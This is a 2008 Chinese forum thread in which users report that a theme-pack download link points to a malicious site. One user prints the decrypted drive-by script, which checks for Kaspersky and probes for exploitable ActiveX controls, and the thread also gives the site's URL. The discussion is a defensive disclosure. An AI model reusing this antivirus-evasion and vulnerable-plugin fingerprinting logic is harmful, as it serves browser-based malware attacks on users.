软件下载区：深度美化主题包4.0，链接病毒网站

显示全部楼层 · 发表于 2008-1-8 20:21:33

显示全部楼层 · 发表于 2008-1-9 13:05:53

帖子链接？？

显示全部楼层 · 发表于 2008-1-9 13:23:48

的确耶，红伞报毒

不知是不是误报

显示全部楼层 · 发表于 2008-1-9 13:33:25

请楼主给上帖子链接，最好附带扫描报告、相关截图，我们会及时处理的，谢谢

显示全部楼层 · 发表于 2008-1-9 13:40:23

请斑竹打开该主题的下载链接，我的卡巴马上报毒
在软件下载区，主题为：深度美化主题包4.0
这是该主题留的下载链接：
http://www.yeswx.com/soft/sort02/sort071/down-124.html 下载连接。

[ 本帖最后由 mirsword 于 2008-1-9 13:43 编辑 ]

显示全部楼层 · 发表于 2008-1-9 14:19:46

如图

显示全部楼层 · 发表于 2008-1-9 14:25:56

网页里确实有个js脚本有问题，费尔报的是addr[1].js

解密以后能看到一个动作是判断是否安装卡巴，后面有利用漏洞的语句

源码：
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%206.0\\Doc\\context.chm::/images/help.gif";kis7.src="mk:@MSITStore:"+root+":\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%207.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();uuuuuuuuuuudddddddd="bbbbbbbbbbbbbbbbbbbbbfuck";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('')}catch(e){}uuuuuuuuuuudddddddd="bbbbbbbbbbbbbbbbbbbbbfuck";try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('')}catch(e){}uuuuuuuuuuudddddddd="bbbbbbbbbbbbbbbbbbbbbfuck"}